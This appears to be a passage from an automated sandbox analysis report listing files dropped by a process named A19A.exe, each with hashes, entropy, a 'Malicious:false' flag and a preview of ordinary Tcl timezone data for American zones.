                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5yM9Ep0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCWg7ydhSU:b9c0ZB9yRwhS+/po/lKENURMo8XvCWgi
                                                                                                                                                                                                                                                                                                                                MD5:892E23EEB82C4EF52CB830C607E3DD6D
                                                                                                                                                                                                                                                                                                                                SHA1:9A9334DC1F9FBA0152C1B5CAA954F2FF1775B78C
                                                                                                                                                                                                                                                                                                                                SHA-256:F3D19E51463B4D04BE1CD4F36CD9DD5E3954B6186ADD6A176B78C3C4F399CCA1
                                                                                                                                                                                                                                                                                                                                SHA-512:4FCC3F61E261D57788756921AE21E54D387AB533ACF56182579B9082EC0791CD655D50BEDDAF996233CDBDE549F743855C191BCB581EF3D7877C4CE26B14EEC2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Tucuman) {. {-9223372036854775808 -15652 0 LMT}. {-2372096348 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-733780800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2007
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6562927023582197
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:56Yp0SaS2SeSNS2S/SwS8gSvJ1/SKSHSRCSiS9SDS+SGwRShoSdXvCWvXydhSTHd:QI0ZB9yRwhS+/po/lKENURMo8XvCWvXz
                                                                                                                                                                                                                                                                                                                                MD5:EA31C60D08FFE56504DEC62A539F51D9
                                                                                                                                                                                                                                                                                                                                SHA1:79F31368AC9C141B5F0F5804A0D903C12B75A386
                                                                                                                                                                                                                                                                                                                                SHA-256:4E3A4539FE0D8E0401C8304E5A79F40C420333C92BF1227BCBB5DB242444ECD6
                                                                                                                                                                                                                                                                                                                                SHA-512:EB58A3122DE8FC7887622D3716E1D9D615625FC47C30BA0BD8112894B595263F04B37D43E142C43251C48D2CD703BB6F56966B965C5475DA83F2C290B6F564E8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Ushuaia) {. {-9223372036854775808 -16392 0 LMT}. {-2372095608 -15408 0 CMT}. {-1567453392 -14400 0 -04}. {-1233432000 -10800 0 -04}. {-1222981200 -14400 0 -04}. {-1205956800 -10800 1 -04}. {-1194037200 -14400 0 -04}. {-1172865600 -10800 1 -04}. {-1162501200 -14400 0 -04}. {-1141329600 -10800 1 -04}. {-1130965200 -14400 0 -04}. {-1109793600 -10800 1 -04}. {-1099429200 -14400 0 -04}. {-1078257600 -10800 1 -04}. {-1067806800 -14400 0 -04}. {-1046635200 -10800 1 -04}. {-1036270800 -14400 0 -04}. {-1015099200 -10800 1 -04}. {-1004734800 -14400 0 -04}. {-983563200 -10800 1 -04}. {-973198800 -14400 0 -04}. {-952027200 -10800 1 -04}. {-941576400 -14400 0 -04}. {-931032000 -10800 1 -04}. {-900882000 -14400 0 -04}. {-890337600 -10800 1 -04}. {-833749200 -14400 0 -04}. {-827265600 -10800 1 -04}. {-752274000 -14400 0 -04}. {-733780800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):182
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.760006229014668
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx09CvjHVAIg209CvjvQ2IAcGE/nVIAcGE9Cvju:SlSWB9IZaM3y79CzVAIgp9CE290/V90J
                                                                                                                                                                                                                                                                                                                                MD5:84605CB5AC93D51FF8C0C3D46B6A566F
                                                                                                                                                                                                                                                                                                                                SHA1:8B56DBDAD33684743E5828EFBD638F082E9AA20D
                                                                                                                                                                                                                                                                                                                                SHA-256:680651D932753C9F9E856018B7C1B6D944536111900CB56685ABA958DE9EC9C1
                                                                                                                                                                                                                                                                                                                                SHA-512:A5FA747C4743130308A8D8832AD33CF10B2DA2F214DEE129CAC9543D6F88FF232B4387026976578D037DF7816D0F4177835866A35F497438DD2526FEBACA2AF6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Curacao)]} {. LoadTimeZoneFile America/Curacao.}.set TZData(:America/Aruba) $TZData(:America/Curacao).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7685
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4198614734785875
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:57TOr5dwtvNJZWDQ2eBTVSZKnb0Yg6f5xgTK5IQPyP8D3rVPe9DptTkhXXkbCkCg:5P7J1A
                                                                                                                                                                                                                                                                                                                                MD5:625A707182C6E0027D49F0FFD775AC51
                                                                                                                                                                                                                                                                                                                                SHA1:6423A50DB875051656A1C3C5B6C6AF556F8FBE0A
                                                                                                                                                                                                                                                                                                                                SHA-256:CD884C5C99949F5723DC94FBFF011B97AE0989EF2EDE089B30C2CD4893AFCE08
                                                                                                                                                                                                                                                                                                                                SHA-512:C5787953997D7D1B583AEE7F68FCC255AC1FAC5C9A7025C8093F274206A0C8163DE221B4823F7750B5B30AF32D673F88D5956C0E510851EBA72CC2360AC35D18
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Asuncion) {. {-9223372036854775808 -13840 0 LMT}. {-2524507760 -13840 0 AMT}. {-1206389360 -14400 0 -04}. {86760000 -10800 0 -03}. {134017200 -14400 0 -04}. {162878400 -14400 0 -04}. {181368000 -10800 1 -04}. {194497200 -14400 0 -04}. {212990400 -10800 1 -04}. {226033200 -14400 0 -04}. {244526400 -10800 1 -04}. {257569200 -14400 0 -04}. {276062400 -10800 1 -04}. {291783600 -14400 0 -04}. {307598400 -10800 1 -04}. {323406000 -14400 0 -04}. {339220800 -10800 1 -04}. {354942000 -14400 0 -04}. {370756800 -10800 1 -04}. {386478000 -14400 0 -04}. {402292800 -10800 1 -04}. {418014000 -14400 0 -04}. {433828800 -10800 1 -04}. {449636400 -14400 0 -04}. {465451200 -10800 1 -04}. {481172400 -14400 0 -04}. {496987200 -10800 1 -04}. {512708400 -14400 0 -04}. {528523200 -10800 1 -04}. {544244400 -14400 0 -04}. {560059200 -10800 1 -04}. {57586
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):332
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.582750266902939
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X5290/qlfbm2OHvcFGxYP329V/uFn/TUs/uFn/lHIs8/kRm5/uFb/C/iin:MBp5290/emdHLYP323/uFn/9/uFn/dBs
                                                                                                                                                                                                                                                                                                                                MD5:66777BB05E04E030FABBC70649290851
                                                                                                                                                                                                                                                                                                                                SHA1:97118A1C4561FC1CC9B7D18EE2C7D805778970B8
                                                                                                                                                                                                                                                                                                                                SHA-256:2C6BBDE21C77163CD32465D773F6EBBA3332CA1EAEEF88BB95F1C98CBCA1562D
                                                                                                                                                                                                                                                                                                                                SHA-512:B00F01A72A5306C71C30B1F0742E14E23202E03924887B2418CA6F5513AE59E12BC45F62B614716BBE50A7BEA8D62310E1B67BB39B84F7B1B40C5D2D19086B7C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Atikokan) {. {-9223372036854775808 -21988 0 LMT}. {-2366733212 -21600 0 CST}. {-1632067200 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-923248800 -18000 1 CDT}. {-880214400 -18000 0 CWT}. {-769395600 -18000 1 CPT}. {-765388800 -18000 0 EST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):172
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.761501750421919
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0/yO5pVAIg20/yOvYvt2IAcGE/ol7x+IAcGE/yOun:SlSWB9IZaM3y7/ykVAIgp/y9F290/ola
                                                                                                                                                                                                                                                                                                                                MD5:E641C6615E1EF015427202803761AADD
                                                                                                                                                                                                                                                                                                                                SHA1:E254129517335E60D82DFE00C6D5AF722D36565A
                                                                                                                                                                                                                                                                                                                                SHA-256:9C546927B107BB4AB345F618A91C0F8C03D8A366028B2F0FCBF0A3CE29E6588E
                                                                                                                                                                                                                                                                                                                                SHA-512:B7D34B1EA0D6722D7BFCD91F082D79EE009B97A2B5684D76A3F04CB59079637134275CF9A0306B9F4423A03CC0C2AB43994207D1B209161C893C2C6F3F3B6311
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Adak)]} {. LoadTimeZoneFile America/Adak.}.set TZData(:America/Atka) $TZData(:America/Adak).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1944
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6123892296166242
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:534h19U2dBUGrmO7XGtN3kh0OjmimtnNIVkHZU7WWhw5N:Nm19U2zUGrpzGtVE0OjmicnyVkHZWWWK
                                                                                                                                                                                                                                                                                                                                MD5:E52095DB1E77EC4553A0AF56665CDE51
                                                                                                                                                                                                                                                                                                                                SHA1:CED0966E8D89443F2CCBBE9F44DA683F7D2D688B
                                                                                                                                                                                                                                                                                                                                SHA-256:30A4658BD46F88A1585ACABB9EB6BA03DB929EAF7D2F430BC4864D194A6CC0DD
                                                                                                                                                                                                                                                                                                                                SHA-512:D6F3D51393F9D8F6414023A8435213EC6BD4FCAA5084B664B828CCDE8D57821E3E284B3D5A27414B4C2AB0B71E31D775D1F924C926C849F591D361DAA8681D8A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Bahia) {. {-9223372036854775808 -9244 0 LMT}. {-1767216356 -10800 0 -03}. {-1206957600 -7200 1 -03}. {-1191362400 -10800 0 -03}. {-1175374800 -7200 1 -03}. {-1159826400 -10800 0 -03}. {-633819600 -7200 1 -03}. {-622069200 -10800 0 -03}. {-602283600 -7200 1 -03}. {-591832800 -10800 0 -03}. {-570747600 -7200 1 -03}. {-560210400 -10800 0 -03}. {-539125200 -7200 1 -03}. {-531352800 -10800 0 -03}. {-191365200 -7200 1 -03}. {-184197600 -10800 0 -03}. {-155163600 -7200 1 -03}. {-150069600 -10800 0 -03}. {-128898000 -7200 1 -03}. {-121125600 -10800 0 -03}. {-99954000 -7200 1 -03}. {-89589600 -10800 0 -03}. {-68418000 -7200 1 -03}. {-57967200 -10800 0 -03}. {499748400 -7200 1 -03}. {511236000 -10800 0 -03}. {530593200 -7200 1 -03}. {540266400 -10800 0 -03}. {562129200 -7200 1 -03}. {571197600 -10800 0 -03}. {592974000 -7200 1 -03}. {602
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6625
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.791871111929614
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:NqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sOVEmbwBlhcCLfYkNRfsNz:NqZL/1dCYDDCxyH4RxGIJkYWXsWwav7S
                                                                                                                                                                                                                                                                                                                                MD5:6A18936EC3AA0FCEC8A230ADAF90FF1E
                                                                                                                                                                                                                                                                                                                                SHA1:B13B8BF1FD2EEED44F63A0DC71F0BCE8AC15C783
                                                                                                                                                                                                                                                                                                                                SHA-256:974481F867DEA51B6D8C6C21432F9F6F7D6A951EC1C34B49D5445305A6FB29B7
                                                                                                                                                                                                                                                                                                                                SHA-512:75AA7A3AE63ED41AFF6CF0F6DC3CA649786A86A64293E715962B003383D31A8AD2B99C72CE6B788EC4DFF1AF7820F011B3F1FD353B37C326EF02289CE4A061BF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Bahia_Banderas) {. {-9223372036854775808 -25260 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):413
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.429320498710922
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp5290eNJmdH9Gcvm/uFkCFP/K/uFkCFks/v/h/uFkCFFoI/qZ/uFkCF3dX/r:cQT7enmSkC9/KSkCT/BSkCLl/wSkCj/r
                                                                                                                                                                                                                                                                                                                                MD5:49EED111AB16F289E7D2D145A2641720
                                                                                                                                                                                                                                                                                                                                SHA1:2F0A37524209FC26421C2951F169B4352250ED9E
                                                                                                                                                                                                                                                                                                                                SHA-256:E7415944397EF395DDBD8EACB6D68662908A25E2DB18E4A3411016CBB6B8AFC6
                                                                                                                                                                                                                                                                                                                                SHA-512:3AD4511798BA763C4E4A549340C807FE2FDF6B107C74A977E425734BBADDFF44ADAA68B5AE1F96170902A10208BC4BBF551C596EB1A3E292071549B8F3012A35
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Barbados) {. {-9223372036854775808 -14309 0 LMT}. {-1451678491 -14309 0 BMT}. {-1199217691 -14400 0 AST}. {234943200 -10800 1 ADT}. {244616400 -14400 0 AST}. {261554400 -10800 1 ADT}. {276066000 -14400 0 AST}. {293004000 -10800 1 ADT}. {307515600 -14400 0 AST}. {325058400 -10800 1 ADT}. {338706000 -14400 0 AST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):996
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.799419505060255
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQYe3wc4h1u80V2dBUGphmC17ewGtN3kN:5VB4h19U2dBUGrmO7XGtN3kN
                                                                                                                                                                                                                                                                                                                                MD5:2F3314B71810C1AC0280F292F09F37BE
                                                                                                                                                                                                                                                                                                                                SHA1:B8702125A9768AE530354CE2A765BC07BABAEF34
                                                                                                                                                                                                                                                                                                                                SHA-256:9ECA949D328915C6CB02A2E6084F3E0730D49F1C53C6D6AA12751F852C51BF02
                                                                                                                                                                                                                                                                                                                                SHA-512:C4E1ADD2E580BFD4100EE776305530BCEA017D57A65205881536A1CDDA3A299816C133B5B1F4B40A99E47BB94AE2A7E727F3D24D06131705818CC0C1AA12E5BD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Belem) {. {-9223372036854775808 -11636 0 LMT}. {-1767213964 -10800 0 -03}. {-1206957600 -7200 1 -03}. {-1191362400 -10800 0 -03}. {-1175374800 -7200 1 -03}. {-1159826400 -10800 0 -03}. {-633819600 -7200 1 -03}. {-622069200 -10800 0 -03}. {-602283600 -7200 1 -03}. {-591832800 -10800 0 -03}. {-570747600 -7200 1 -03}. {-560210400 -10800 0 -03}. {-539125200 -7200 1 -03}. {-531352800 -10800 0 -03}. {-191365200 -7200 1 -03}. {-184197600 -10800 0 -03}. {-155163600 -7200 1 -03}. {-150069600 -10800 0 -03}. {-128898000 -7200 1 -03}. {-121125600 -10800 0 -03}. {-99954000 -7200 1 -03}. {-89589600 -10800 0 -03}. {-68418000 -7200 1 -03}. {-57967200 -10800 0 -03}. {499748400 -7200 1 -03}. {511236000 -10800 0 -03}. {530593200 -7200 1 -03}. {540266400 -10800 0 -03}. {562129200 -7200 1 -03}. {571197600 -10800 0 -03}. {590032800 -10800 0 -03}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1854
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8463726575443573
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQMeVyJOCSSVTSuWcLwX1QIXVlXco0bKdTu/pUHQGyUrROSTgltVJyODrUSn/mJO:5hxKj4jDMtVpIM/mjM/sQ
                                                                                                                                                                                                                                                                                                                                MD5:1BFD01ECF77E031C23BDA5ED371E061F
                                                                                                                                                                                                                                                                                                                                SHA1:7A38C5665A834B812613E4D10FE4D1E45F606407
                                                                                                                                                                                                                                                                                                                                SHA-256:BDF09D97876E3A3C0422C655562252806B4EF914679FDCAB6DD78BD2B84DD932
                                                                                                                                                                                                                                                                                                                                SHA-512:D7A2C2645129C4BAB1F0170A29A084396AD8CF07237DE339512C3A5C7227B017BF1D4B78EBD5A7274CAF1D172ECB2DB6F912887BFF1C6AC73E9D645E333A75A3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Belize) {. {-9223372036854775808 -21168 0 LMT}. {-1822500432 -21600 0 CST}. {-1616954400 -19800 1 -0530}. {-1606069800 -21600 0 CST}. {-1585504800 -19800 1 -0530}. {-1574015400 -21600 0 CST}. {-1554055200 -19800 1 -0530}. {-1542565800 -21600 0 CST}. {-1522605600 -19800 1 -0530}. {-1511116200 -21600 0 CST}. {-1490551200 -19800 1 -0530}. {-1479666600 -21600 0 CST}. {-1459101600 -19800 1 -0530}. {-1448217000 -21600 0 CST}. {-1427652000 -19800 1 -0530}. {-1416162600 -21600 0 CST}. {-1396202400 -19800 1 -0530}. {-1384713000 -21600 0 CST}. {-1364752800 -19800 1 -0530}. {-1353263400 -21600 0 CST}. {-1333303200 -19800 1 -0530}. {-1321813800 -21600 0 CST}. {-1301248800 -19800 1 -0530}. {-1290364200 -21600 0 CST}. {-1269799200 -19800 1 -0530}. {-1258914600 -21600 0 CST}. {-1238349600 -19800 1 -0530}. {-1226860200 -21600 0 CST}. {-1206900000 -1980
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.599775510303771
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X5290Am2OHff4YPawmX/bVVFUFkCFVUP/GH6/XVVFUFkIZVVFUFkeF3k/g:MBp5290AmdHff4YPawY/b/uFkCFVUP/L
                                                                                                                                                                                                                                                                                                                                MD5:5ACBD50E1CB87B4E7B735A8B5281917B
                                                                                                                                                                                                                                                                                                                                SHA1:3E92C60B365C7E1F9BF5F312B007CBFD4175DB8F
                                                                                                                                                                                                                                                                                                                                SHA-256:E61F3762B827971147772A01D51763A18CC5BED8F736000C64B4BDFF32973803
                                                                                                                                                                                                                                                                                                                                SHA-512:9284FFDF115C7D7E548A06A6513E3591F88EE3E5197106B71B54CD82F27890D12773381218BCA69720F074A6762282F25830422DFA402FF19301D6834FD9FF7D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Blanc-Sablon) {. {-9223372036854775808 -13708 0 LMT}. {-2713896692 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {14400 -14400 0 AST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1159
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7116873200926586
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQETmex8Sos/USws/QSI/LHSD/vOSy/WS3o/aS2/vSh/TSSX/WcSp/ySZd/YlSjx:5EqSaSwXS4SqSbS3JSySxSxcSESAlSQE
                                                                                                                                                                                                                                                                                                                                MD5:0858FCA5A59C9C6EE38B7E8A61307412
                                                                                                                                                                                                                                                                                                                                SHA1:685597A5FD8BFEBF3EC558DB8ABF11903F63E05E
                                                                                                                                                                                                                                                                                                                                SHA-256:825E89E4B35C9BA92CF53380475960C36307BF11FD87057891DF6EEBA984A88D
                                                                                                                                                                                                                                                                                                                                SHA-512:7369EE42CD73CFD635505BF784E16A36C9BBDE0BDAAAB405CB8401EBC508F4CE0B0155206756C1905E915756F1D3CDC381C6B9C357A01EAE0ECC4C448978844A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Boa_Vista) {. {-9223372036854775808 -14560 0 LMT}. {-1767211040 -14400 0 -04}. {-1206954000 -10800 1 -04}. {-1191358800 -14400 0 -04}. {-1175371200 -10800 1 -04}. {-1159822800 -14400 0 -04}. {-633816000 -10800 1 -04}. {-622065600 -14400 0 -04}. {-602280000 -10800 1 -04}. {-591829200 -14400 0 -04}. {-570744000 -10800 1 -04}. {-560206800 -14400 0 -04}. {-539121600 -10800 1 -04}. {-531349200 -14400 0 -04}. {-191361600 -10800 1 -04}. {-184194000 -14400 0 -04}. {-155160000 -10800 1 -04}. {-150066000 -14400 0 -04}. {-128894400 -10800 1 -04}. {-121122000 -14400 0 -04}. {-99950400 -10800 1 -04}. {-89586000 -14400 0 -04}. {-68414400 -10800 1 -04}. {-57963600 -14400 0 -04}. {499752000 -10800 1 -04}. {511239600 -14400 0 -04}. {530596800 -10800 1 -04}. {540270000 -14400 0 -04}. {562132800 -10800 1 -04}. {571201200 -14400 0 -04}. {590036400 -1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):237
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.649012348678967
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X5290bJqm2OHDgPcuknTEXPKV93kR/uFeEV/KV9C:MBp5290bUmdHDgPcukT8O93Y/uF7/O9C
                                                                                                                                                                                                                                                                                                                                MD5:4B3B0F66FB3BC69A5AB5DA79D02F7E34
                                                                                                                                                                                                                                                                                                                                SHA1:79B84C0578BBB0E4C07E99977D02EDE45F11CC8A
                                                                                                                                                                                                                                                                                                                                SHA-256:E7C45CA67F1BA913E7DC1632C166973FDA8DA4734F8BCF3AB1157A45454C8D7B
                                                                                                                                                                                                                                                                                                                                SHA-512:96289B4D179F146D6C5FB5DDAA4336CBCB60CF27BABCC20B9691387920897B293903DF41F5D9DE7237A689013A9266134B32AB4B4656796419B46E8378D84358
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Bogota) {. {-9223372036854775808 -17776 0 LMT}. {-2707671824 -17776 0 BMT}. {-1739041424 -18000 0 -05}. {704869200 -14400 1 -05}. {733896000 -18000 0 -05}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8324
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.772029913040983
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:e45eG5cnWsGm+4I1zXN+C2mWBNQMsmNTxf6AeO+cblX:xGnWdVUC2mWBNwWTxyWR
                                                                                                                                                                                                                                                                                                                                MD5:239425659E7345C757E6A44ABF258A22
                                                                                                                                                                                                                                                                                                                                SHA1:9659217B4D55795333DFA5E08451B69D17F514AD
                                                                                                                                                                                                                                                                                                                                SHA-256:6D6D377DDF237B1C5AB012DDDEB5F4FAA39D1D51240AA5C4C34EE96556D2D2F4
                                                                                                                                                                                                                                                                                                                                SHA-512:3891D7BC1F84FF6B01B6C2DF6F0413C9E168E5B84CE445030F1B871766DD38B2FF7418501AB7C0DCEAB8381E538D65DF4E7708502EE924546A28DF1AC9BB7129
                                                                                                                                                                                                                                                                                                                                Malicious:false
